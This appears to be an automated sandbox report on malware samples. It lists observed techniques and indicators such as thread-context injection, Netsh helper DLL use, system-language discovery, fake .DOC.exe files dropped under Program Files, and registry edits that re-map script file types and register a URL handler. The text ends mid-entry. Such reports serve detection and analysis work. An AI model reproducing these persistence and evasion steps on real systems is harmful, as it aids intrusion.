Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
reg.exeCLWCP.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\Desktop\WallPaper = "C:\\Users\\%username%\\Desktop\\t\\a\\bg.png" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\Desktop\Wallpaper = "c:\\temp\\bg.bmp" CLWCP.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
description pid Process procid_target PID 2028 set thread context of 3156 2028 1758 PID 2152 set thread context of 1780 2152 1762 PID 3064 set thread context of 1648 3064 1765 -
Drops file in Program Files directory 41 IoCs
Processes:
WinaeroTweaker-1.40.0.0-setup.tmpscary.exedescription ioc Process File opened for modification \??\c:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.DOC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.DOC.exe File opened for modification C:\Program Files\GrantFind.nal File opened for modification \??\c:\Program Files\GrantFind.doc.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.DOC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.DOC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.nal File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweakerHelper.exe WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-FQT9G.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-E52BO.tmp WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\GrantFind.doc.exe File opened for modification \??\c:\Program Files\GrantFind.doc.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.DOC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.nal File created C:\Program Files\Winaero Tweaker\unins000.dat WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-KBLUS.tmp WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification \??\c:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.DOC.exe File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweaker_x86_64.dll WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-GR5AU.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created \??\c:\Program Files\GrantFind.doc.exe File created \??\c:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.DOC.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.DOC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.nal File created \??\c:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.DOC.exe File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweaker.exe WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-AFBNO.tmp WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.nal File created C:\Program Files\SubDir\Romilyaa.exe scary.exe File opened for modification C:\Program Files\GrantFind.nal File created C:\Program Files\Winaero Tweaker\is-FG6QD.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-A702T.tmp WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\Winaero Tweaker\unins000.dat WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.DOC.exe File opened for modification C:\Program Files\Winaero Tweaker\WinaeroControls.dll WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweaker_i386.dll WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-OP0Q6.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-HS80U.tmp WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\SubDir\Romilyaa.exe scary.exe File opened for modification C:\Program Files\GrantFind.doc.exe File opened for modification C:\Program Files\Winaero Tweaker\Elevator.exe WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-01F1Q.tmp WinaeroTweaker-1.40.0.0-setup.tmp -
Drops file in Windows directory 7 IoCs
Processes:
description ioc Process File opened for modification C:\Windows\mydoc.rtf File opened for modification C:\Windows\Logs\DPX\setupact.log File opened for modification C:\Windows\Logs\DPX\setuperr.log File opened for modification C:\Windows\mydoc.rtf File created C:\Windows\~$mydoc.rtf File opened for modification C:\Windows\Debug\WIA\wiatrace.log File opened for modification C:\Windows\~$mydoc.rtf -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe -
Program crash 1 IoCs
Processes:
pid pid_target Process procid_target 936 3452 1767 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
findstr.exefindstr.exefindstr.exeicacls.exefindstr.exebitsadmin.execmd.exefindstr.exebitsadmin.exewimloader.dllfindstr.exefindstr.execmd.exefindstr.exefindstr.exebitsadmin.execmd.exefindstr.exebitsadmin.exefindstr.exefindstr.exebitsadmin.execmd.execmd.exebitsadmin.exebitsadmin.execmd.exebitsadmin.exefindstr.exetimeout.execmd.exefindstr.exefindstr.exebitsadmin.exefindstr.exebitsadmin.exebitsadmin.exefindstr.execmd.execmd.exebitsadmin.exefindstr.exefindstr.exefindstr.execmd.exefindstr.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wimloader.dll Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 24 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid Process 2716 PING.EXE 980 PING.EXE 2680 2716 3136 2216 PING.EXE 2968 PING.EXE 3712 PING.EXE 1524 PING.EXE 480 PING.EXE 2236 PING.EXE 1584 PING.EXE 1628 PING.EXE 3104 PING.EXE 2736 PING.EXE 2264 PING.EXE 4088 PING.EXE 1288 PING.EXE 292 PING.EXE 3432 PING.EXE 2376 PING.EXE 3352 PING.EXE 4040 PING.EXE 748 -
NSIS installer 2 IoCs
Processes:
resource yara_rule behavioral1/files/0x0005000000019bf0-227.dat nsis_installer_1 behavioral1/files/0x0005000000019bf0-227.dat nsis_installer_2 -
Office loads VBA resources, possible macro or embedded object present
-
Delays execution with timeout.exe 4 IoCs
Processes:
timeout.exetimeout.exetimeout.exepid Process 2084 timeout.exe 1280 timeout.exe 3724 3732 timeout.exe -
Enumerates system info in registry 2 TTPs 13 IoCs
Processes:
xcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid Process 2848 ipconfig.exe -
Kills process with taskkill 7 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid Process 1580 taskkill.exe 3268 taskkill.exe 3244 taskkill.exe 3964 taskkill.exe 1936 taskkill.exe 3836 1808 -
Processes:
reg.exeIEXPLORE.EXEiexplore.exeiexplore.exeIEXPLORE.EXEdescription ioc Process Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\29 reg.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\33 reg.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\34 reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "1663" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\DOMStorage\facebook.com\NumberOfSubdomains = "1" Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.youtube.com\ = "1581" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "6" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "3045" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\International\Scripts\20\IEPropFontName = "Leelawadee UI" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.youtube.com\ = "0" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "0" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\12 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\International\Scripts\14\IEPropFontName = "Kalinga" reg.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\DOMStorage\youtube.com\Total = "282" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\International\Scripts\28\IEFixedFontName = "Gadugi" reg.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\International\Scripts\11\IEPropFontName = "Shonar Bangla" reg.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\16 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\International\Scripts\26\IEPropFontName = "Simsun" reg.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\30 reg.exe Set value (data) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.youtube.com\ = "3045" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\20 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\International\Scripts\21\IEFixedFontName = "Microsoft Himalaya" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\International\Scripts\23\IEPropFontName = "Gulim" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\International\Scripts\31\IEFixedFontName = "Times New Roman" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\International\Scripts\38\IEFixedFontName = "MV Boli" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\International\Scripts\7\IEPropFontName = "Times New Roman" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\International\Scripts\13\IEFixedFontName = "Shruti" reg.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "115" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\International\Scripts\14\IEFixedFontName = "Kalinga" reg.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\25 reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "428443201" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\DOMStorage\youtube.com\Total = "3045" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\26 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFixedFontName = "Courier New" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.youtube.com\ = "197" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\International\Scripts\24\IEFixedFontName = "MS Gothic" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\International\Scripts\9\IEFixedFontName = "Courier New" reg.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\17 reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\DOMStorage\youtube.com\Total = "1663" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\21 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\International\Scripts\33\IEPropFontName = "Times New Roman" reg.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\International\Scripts\39\IEPropFontName = "Mongolian Baiti" reg.exe -
Modifies registry class 36 IoCs
Processes:
3.exerundll32.exerundll32.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\psiphon\ = "URL:psiphon" 3.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\py_auto_file\ rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\.py\ = "py_auto_file" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\py_auto_file\shell\Read rundll32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\psiphon\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\vir_b0101f2a-a3f0-48c4-bf84-06bd65d62fde\\bloatware\\3.exe\" -- \"%1\"" 3.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\py_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" rundll32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\Com2 = "6BCEFAC9FE10F1E7847A3B4086E93E96B3FC038D4365033CE1BA459908D6" Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.wsc\ = "txtfile" Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.WSF\ = "txtfile" Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\psiphon\shell\open 3.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_Classes\Local Settings rundll32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\Com4 = "7EF5FCFF482B856D9133D7207DE2BC90E632584267326330D690" Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\py_auto_file\shell\Read\command rundll32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\Com3 = "2FB6B12D4497389D53CBB9D33292D7C5" Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.wsf Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.wsc Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\psiphon 3.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\psiphon\shell\open\command 3.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\psiphon\shell 3.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\py_auto_file rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\py_auto_file\shell rundll32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.wsh Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\psiphon\URL Protocol 3.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\.py rundll32.exe Key created \REGISTRY\MACHINE\Software\Classes\CLV.Classes Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\Com1 = "334F2C7F9D5583506A3077D577202CDA7C8664A8" Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\StartCom1 = 